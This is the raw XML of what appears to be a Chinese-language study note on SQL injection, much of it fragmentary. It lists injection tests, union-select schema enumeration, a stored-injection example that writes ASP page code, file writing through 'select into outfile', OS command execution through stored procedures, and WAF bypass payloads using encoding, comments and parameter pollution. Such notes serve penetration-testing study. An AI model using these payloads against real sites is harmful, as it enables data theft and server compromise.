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RDefault="00912F6A" w:rsidP="00912F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1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回不同说明存在注入漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRDefault="00912F6A" w:rsidP="00912F6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单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t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tab/>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本</w:t>
      </w:r>
      <w:r w:rsidR="00DD2A2D">
        <w:t>注入测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2A2D" w:rsidRDefault="00DD2A2D" w:rsidP="00DD2A2D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nion </w:t>
      </w:r>
      <w:r>
        <w:t>select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联合</w:t>
      </w:r>
      <w:r>
        <w:t>查询注入测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字过滤</w:t>
      </w:r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911E7F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162020" w:rsidP="00162020">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，使用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”进行字符连接时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会尝试将字段值转换为数字类型（如果转换失败，就当做数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理）。如’</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>′，</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将“</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”转成数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行运算；将“</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”当做</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00162020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRPr="006B7F02" w:rsidRDefault="000F184C" w:rsidP="00911E7F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911E7F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lastRenderedPageBreak/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911E7F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911E7F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6B12EC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6B12EC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A63A45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911E7F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911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00912F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>拓展存储注入攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRDefault="00912F6A" w:rsidP="006B12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6B12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6B12EC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6B12EC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6B12EC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 xml:space="preserve">;insert into test(str)values ('&lt;%@ Page </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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911E7F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6B12EC">
      <w:pPr>
        <w:pStyle w:val="3"/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6B12EC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6B12EC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6B12EC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6B12EC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911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF7040">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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911E7F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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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911E7F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911E7F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6B12EC">
      <w:pPr>
        <w:pStyle w:val="3"/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6B12EC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414F9E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6B12EC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6B12EC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1,2,gRoUp_coNcAt(SCHEMA_NAME),4,5  fRom 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6B12EC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6B12EC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6B12EC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6B12EC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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911E7F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414F9E" w:rsidRPr="00AA39CC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414F9E" w:rsidRDefault="00414F9E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 xml:space="preserve">length() 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>ascii(‘A’) ord(65)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00414F9E" w:rsidRPr="00AA39CC" w:rsidRDefault="00414F9E" w:rsidP="00AA39CC">
                      <w:r w:rsidRPr="00AA39CC">
                        <w:tab/>
                        <w:t>char(77, 121, 83, 81, 76)---MySQL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414F9E" w:rsidRPr="00AA39CC" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00414F9E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911E7F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43223F">
      <w:pPr>
        <w:pStyle w:val="3"/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43223F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14F9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14F9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14F9E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414F9E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14F9E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202978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0303C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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911E7F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911E7F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911E7F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lastRenderedPageBreak/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911E7F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911E7F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911E7F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A64139" w:rsidRDefault="00C31FF2" w:rsidP="00911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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351730">
      <w:pPr>
        <w:pStyle w:val="3"/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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00FB3B4F" w:rsidP="00414F9E">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                            </w:pPr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</w:t>
                            </w:r>
                            <w:r w:rsidR="006C4ECE">
                              <w:t xml:space="preserve">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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRDefault="00FB3B4F" w:rsidP="00414F9E">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr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</w:t>
                      </w:r>
                      <w:r w:rsidR="006C4ECE">
                        <w:t xml:space="preserve">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Pr="00351730" w:rsidRDefault="00F82588" w:rsidP="00F47AE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64139" w:rsidRDefault="00A64139" w:rsidP="00372F6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p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11E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符型和数字型的基本原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005071EC" w:rsidRDefault="001A53B5" w:rsidP="001A53B5">
      <w:pPr>
        <w:pStyle w:val="3"/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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00414F9E" w:rsidRDefault="00414F9E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Pr="00377B7F" w:rsidRDefault="00414F9E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414F9E" w:rsidRPr="00D3129B" w:rsidRDefault="00414F9E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29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I2/OBA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414F9E" w:rsidRPr="00377B7F" w:rsidRDefault="00414F9E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414F9E" w:rsidRPr="00D3129B" w:rsidRDefault="00414F9E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D3129B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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00414F9E" w:rsidRDefault="00414F9E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F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRPr="00264C7E" w:rsidRDefault="00414F9E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1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FQ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pNj/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OJF8VA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414F9E" w:rsidRDefault="00414F9E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414F9E" w:rsidRPr="00264C7E" w:rsidRDefault="00414F9E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911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A64139">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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912F6A" w:rsidRPr="005C2440" w:rsidRDefault="00912F6A" w:rsidP="00D77A34">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:r w:rsidRPr="005C2440">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问操作系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRDefault="00912F6A" w:rsidP="00911E7F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911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRDefault="00912F6A" w:rsidP="006B12EC">
      <w:pPr>
        <w:pStyle w:val="3"/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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select into outfile(dumpfile)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r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6B12EC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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>过调用该存储过程来执行操作系统命令。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911E7F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911E7F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911E7F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根据</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套的层次进行绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00912F6A" w:rsidRPr="00B75BE3" w:rsidRDefault="00912F6A" w:rsidP="00911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B75BE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w: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911E7F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661E9D" w:rsidRDefault="00661E9D" w:rsidP="00911E7F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661E9D" w:rsidRDefault="00661E9D" w:rsidP="00661E9D">
      <w:pPr>
        <w:pStyle w:val="3"/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661E9D" w:rsidRDefault="00661E9D" w:rsidP="00E02475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EA505C" w:rsidRDefault="00414F9E" w:rsidP="00E02475">
      <w:pPr>
        <w:ind w:leftChars="600" w:left="1260"/>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="00EA505C" w:rsidRPr="00B65BF2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://xxx.asp?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EA505C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA505C">
        <w:t>an%d 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA505C" w:rsidRDefault="00EA505C" w:rsidP="00EA505C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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EA505C" w:rsidRDefault="00EA505C" w:rsidP="00E02475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EA505C" w:rsidRDefault="00414F9E" w:rsidP="00E02475">
      <w:pPr>
        <w:ind w:leftChars="600" w:left="1260"/>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00EA505C" w:rsidRPr="00B65BF2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://xx.aspx?i</w:t>
        </w:r>
        <w:r w:rsidR="00EA505C" w:rsidRPr="00B65BF2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>d=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EA505C">
        <w:t xml:space="preserve"> union s%u0065lect ‘hi’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA505C" w:rsidRDefault="00021A56" w:rsidP="00021A56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136C85" w:rsidRPr="00136C85" w:rsidRDefault="00136C85" w:rsidP="00E02475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21A56" w:rsidRDefault="00021A56" w:rsidP="00E02475">
      <w:pPr>
        <w:ind w:leftChars="600" w:left="1260"/>
      </w:pPr>
      <w:r>
        <w:t>select===s%u0065===s%u00f0lect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043569E" w:rsidRDefault="0043569E" w:rsidP="00911E7F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43569E" w:rsidRDefault="0043569E" w:rsidP="0043569E">
      <w:pPr>
        <w:pStyle w:val="3"/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43569E" w:rsidRDefault="0043569E" w:rsidP="0043569E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7531EF" w:rsidRDefault="007531EF" w:rsidP="007531EF">
      <w:r w:rsidRPr="007531EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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40" w:rsidRDefault="003A5240" w:rsidP="00911E7F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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:t>针对参数的污染</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240">
      <w:pPr>
        <w:ind w:left="1260"/>
      </w:pPr>
      <w:r w:rsidRPr="003A5240">
        <w:t>?id=1&amp;id=2&amp;id=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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3A5240" w:rsidRDefault="003A5240" w:rsidP="003A5240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806E53" w:rsidRDefault="00806E53" w:rsidP="00806E53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806E53" w:rsidRDefault="00806E53" w:rsidP="00806E53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806E53" w:rsidRDefault="00806E53" w:rsidP="00806E53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172FD9" w:rsidRDefault="00172FD9" w:rsidP="00911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>层</w:t>
      </w:r>
      <w:r>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:t>君立华域</w:t>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:t>bypass.pdf</w:t>
      </w:r>
      <w:r w:rsidR="009E6960"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5pt" o:ole="">
            <v:imagedata r:id="rId52" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1558610472" r:id="rId53"/>
        </w:object>
      </w:r>
      <w:r w:rsidR="00F16A3F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172FD9" w:rsidRDefault="004C3A4D" w:rsidP="004C3A4D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空白符</w:t>
      </w:r>
      <w:r>
        <w:t>编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C3A4D" w:rsidRDefault="004C3A4D" w:rsidP="004C3A4D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79D98C13" wp14:editId="2932A35F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4D" w:rsidRDefault="00C866A7" w:rsidP="00C866A7">
      <w:pPr>
        <w:pStyle w:val="3"/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C866A7" w:rsidRDefault="00C866A7" w:rsidP="00C866A7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C866A7" w:rsidRDefault="00C866A7" w:rsidP="00C866A7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>select * from user_listwhere uid=1.0union select 1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C866A7" w:rsidRDefault="00C866A7" w:rsidP="00C866A7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>select * from user_listwhere uid=1E0union select 1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C866A7" w:rsidRDefault="00C866A7" w:rsidP="00C866A7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:t>select * from user_listwhere uid=1\Nunionselect 1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C866A7" w:rsidRDefault="00C866A7" w:rsidP="00C866A7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>select * from user_listwhere uid=1/*!5000union*/ select 1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C866A7" w:rsidRDefault="009102A6" w:rsidP="003D6228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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/*letmetest*/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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>select * from user_listwhere uid=1 union(select 1,2,3,4,5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009102A6" w:rsidRDefault="009102A6" w:rsidP="003D6228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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/*letmetest*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6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9102A6" w:rsidRDefault="009102A6" w:rsidP="009102A6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lastRenderedPageBreak/>
        <w:t>双引号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select * from user_listwhere uid=1 union select"1",2,3,4,5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>{</w:t>
      </w:r>
      <w:r w:rsidR="004E0AB5"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C1382B" w:rsidRDefault="00C1382B" w:rsidP="00C1382B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2A2225" w:rsidRDefault="002A2225" w:rsidP="003D6228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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/*letmetest*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="002A2225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2A2225" w:rsidRDefault="002A2225" w:rsidP="003D6228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D3333B" w:rsidRDefault="00D3333B" w:rsidP="00D3333B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D3333B" w:rsidRDefault="00D3333B" w:rsidP="00D3333B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D3333B" w:rsidRDefault="00D3333B" w:rsidP="00974D28">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3333B" w:rsidRDefault="00D3333B" w:rsidP="00974D28">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>/*letmetest*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3333B" w:rsidRDefault="00D3333B" w:rsidP="00D3333B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D3333B" w:rsidRDefault="00D3333B" w:rsidP="007657E2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D3333B" w:rsidRDefault="00D3333B" w:rsidP="007657E2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D3333B" w:rsidRDefault="00D3333B" w:rsidP="007657E2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2A2225" w:rsidRDefault="00D3333B" w:rsidP="007657E2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B3563C" w:rsidRDefault="00911B79" w:rsidP="00911B79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911B79" w:rsidRDefault="00911B79" w:rsidP="00911B79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911B79" w:rsidRDefault="00911B79" w:rsidP="00911B79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911B79" w:rsidRDefault="00911B79" w:rsidP="00911B79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911B79" w:rsidRPr="004C3A4D" w:rsidRDefault="00911B79" w:rsidP="00911B79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911E7F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P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F6A" w:rsidRPr="00B75BE3" w:rsidRDefault="00912F6A" w:rsidP="00911E7F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911E7F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911E7F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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911E7F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lastRenderedPageBreak/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Pr="009F61D1" w:rsidRDefault="009F61D1" w:rsidP="00911E7F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3728"/>
        <w:gridCol w:w="3728"/>
      </w:tblGrid>
      <w:tr w:rsidR="00990028" w:rsidTr="00990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728" w:type="dxa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9900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3728" w:type="dxa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9900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9900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3728" w:type="dxa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9900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3728" w:type="dxa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9900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9F61D1" w:rsidTr="0099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8" w:type="dxa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3728" w:type="dxa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F61D1" w:rsidRDefault="004C14EA" w:rsidP="00911E7F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lastRenderedPageBreak/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911E7F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911E7F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414F9E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911E7F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911E7F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6B12EC">
      <w:pPr>
        <w:pStyle w:val="3"/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2A0E9B" w:rsidRPr="00DF0994" w:rsidRDefault="00CE24C0" w:rsidP="000322A3">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF0994">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF0994">
        <w:t>绕过办法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE24C0" w:rsidRDefault="00CE24C0" w:rsidP="00DE7D9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BF397A" w:rsidRDefault="00BF397A" w:rsidP="00DE7D9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CE24C0" w:rsidRDefault="00CE24C0" w:rsidP="00DE7D9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CE24C0" w:rsidRDefault="00CE24C0" w:rsidP="00DE7D9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1E7D8A" w:rsidRDefault="001E7D8A" w:rsidP="00DE7D93">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
